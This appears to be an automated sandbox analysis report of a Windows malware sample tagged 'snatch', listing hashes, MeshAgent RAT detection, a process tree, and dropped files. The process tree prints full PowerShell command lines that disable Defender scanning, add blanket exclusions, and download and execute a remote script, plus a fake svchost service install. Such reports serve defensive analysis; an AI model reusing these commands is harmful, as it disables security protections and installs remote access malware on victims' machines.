Analysis

  • max time kernel
    147s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-10-2024 12:07

General

  • Target

    2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe

  • Size

    50.9MB

  • MD5

    5bfa176d4d484262d8762d97bcd2b784

  • SHA1

    7f09db1fa2d3f0d4f73621516eabd95f9175de96

  • SHA256

    54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6

  • SHA512

    93b76a827932ca934b9a76afa0347e7f3e63ba4e09a240b29604edde0903802bd27646e840858374b77f74d9b3fabcca8767f1ab949cd0a0abbb627e4a9b1675

  • SSDEEP

    1572864:95vrmbfVqelXwwPAo8DzC7XhPDLbg5QOApSqugmBRYW6Q/:fI9XwKAoqOsaUNBsQ/

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 64 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1460
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3616
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3976
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4072
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4768
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1824
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            PID:5024
          • C:\Users\Admin\AppData\Local\svchost\svchost.exe
            C:\Users\Admin\AppData\Local\svchost\svchost.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:2316
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c install.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4060
      • C:\Users\Admin\AppData\Local\Temp\install.exe
        install.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:920
        • C:\Windows\SysWOW64\msiexec.exe
          msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSIBBDE.tmp
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:984
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2608
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding E5BD01B1DB0AB92A5BB72FE44CC2ACEF C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:4400
  • C:\Users\Admin\AppData\Local\svchost\svchost.exe
    "C:\Users\Admin\AppData\Local\svchost\svchost.exe" --meshServiceName="Microsoft"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:116
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
        PID:4428
      • C:\Windows\system32\wbem\wmic.exe
        wmic os get oslanguage /FORMAT:LIST
        2⤵
          PID:2244
        • C:\Windows\System32\wbem\wmic.exe
          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
          2⤵
            PID:1908
          • C:\Windows\system32\wbem\wmic.exe
            wmic os get oslanguage /FORMAT:LIST
            2⤵
              PID:1148
            • C:\Windows\System32\wbem\wmic.exe
              wmic SystemEnclosure get ChassisTypes
              2⤵
                PID:4568
              • C:\Windows\System32\wbem\wmic.exe
                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                2⤵
                  PID:4720
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -noprofile -nologo -command -
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Modifies data under HKEY_USERS
                  PID:4280

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\MSIBBDE.tmp

                Filesize

                36.6MB

                MD5

                6d9b5a3b75da266db5c237b0ac70b7f9

                SHA1

                9ce4aa208974b299ce0abeaf043740616f4f0b02

                SHA256

                d57614b838f083937ff98c161e55fa60b5d23de639818ad6eef8335ba23c031b

                SHA512

                fb458b1c2d3b9da748b1775b1bf2098fbe5076a0bc3daf2a93e1be978e3b7e34bc7a75c2660ef97cac3e7ba23ebceae1785dfe8ac124440f34dbd248cd92571d

              • C:\Users\Admin\AppData\Local\Temp\MSIBFF4.tmp

                Filesize

                298KB

                MD5

                684f2d21637cb5835172edad55b6a8d9

                SHA1

                5eac3b8d0733aa11543248b769d7c30d2c53fcdb

                SHA256

                da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0

                SHA512

                7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4xcutgyo.l4u.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\install.exe

                Filesize

                36.6MB

                MD5

                979ce82b2ea35a92fae6a60c6c3e3791

                SHA1

                8d260eea0151ee7a6aae88eb2e9015d5efb2603b

                SHA256

                be86cadf405e9f617601da44bab88f08b3e92ac4349a2616378a9195722925ca

                SHA512

                ec67c1d20ae0f9fffcf471d60f2ade6e08fd5a0e572ee1b58036ce11c5f353db93b622c795fe013a0dbe91fe4921b5ba50c312b8c51716d5cc4921d2050f2724

              • C:\Users\Admin\AppData\Local\svchost\svchost.exe

                Filesize

                5.3MB

                MD5

                29304e42dc26d1276ca93a9c013599a4

                SHA1

                65437796133c2704d20757c99b768ffd915d1502

                SHA256

                83e75c4b57f3a255ec9efcdbda027a5b9577a993359c9a21946d5bec45924dd9

                SHA512

                fa0e66a941030fc9bde0b84e98645f04e3405fe76e539e214f1c1069661ca699e93d245a56fe37d4eec36fa13710bcc1b6c1373d9a0f9a0656ba233ee2aae8ca

              • C:\Users\Admin\AppData\Local\svchost\svchost.msh

                Filesize

                22KB

                MD5

                90f91efb0b6cc632ea6b2bb3a6d5fb40

                SHA1

                e46a39e7252e086f34d64c3d720442cd325de506

                SHA256

                7db6fa16d92fa026ba88337e51623caea566a78eb275af77905286a533792fc9

                SHA512

                f511124b19a4f05e09f253f5f63e991694565247f9c09430368f53d5466ecb8822811107c7c0a9e91e8d1b0ff85bfa37a243b0635eb893c8fae39ea8152c3928

              • memory/1460-5-0x0000000000990000-0x0000000004108000-memory.dmp

                Filesize

                55.5MB

              • memory/1460-50-0x0000000000990000-0x0000000004108000-memory.dmp

                Filesize

                55.5MB

              • memory/1460-48-0x0000000000990000-0x0000000004108000-memory.dmp

                Filesize

                55.5MB

              • memory/3616-11-0x00000216CBAF0000-0x00000216CBB00000-memory.dmp

                Filesize

                64KB

              • memory/3616-12-0x00007FF83C273000-0x00007FF83C275000-memory.dmp

                Filesize

                8KB

              • memory/3616-10-0x00000216CBA50000-0x00000216CBA72000-memory.dmp

                Filesize

                136KB

              • memory/4072-23-0x00000226BC070000-0x00000226BC0E6000-memory.dmp

                Filesize

                472KB

              • memory/4072-22-0x00000226BBFA0000-0x00000226BBFE4000-memory.dmp

                Filesize

                272KB